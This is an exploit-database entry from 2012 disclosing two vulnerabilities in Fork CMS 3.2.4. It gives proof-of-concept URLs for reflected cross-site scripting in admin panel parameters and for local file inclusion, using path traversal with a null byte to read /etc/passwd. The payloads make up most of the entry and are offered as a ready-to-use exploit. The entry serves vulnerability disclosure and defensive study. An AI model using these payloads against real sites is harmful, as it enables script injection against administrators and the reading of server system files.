Fork CMS v.3.2.4 - Multiple Vulnerabilities ( LFI - XSS )

2012-02-15T00:00:00
ID 1337DAY-ID-17528
Type zdt
Reporter Avram Marius
Modified 2012-02-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##########################################################################################################################
# Exploit Title: Fork CMS v.3.2.4 - Multiple Vulnerabilities
# Script Page : http://www.fork-cms.com
# Date: 11-02-2012
# Author : RandomStorm - http://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista
##########################################################################################################################
# Reflected Cross-Site Scripting (XSS) on Admin Panel
# POC:
# http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script> # http://site.com/users/index?token=true&error=</script><script>alert(1)</script> ###########################################################################################################################
# Local File Inclusion ( LFI )
# POC:
# http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en
##########################################################################################################################
# About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.
###########################################################################################################################



#  0day.today [2018-03-20]  #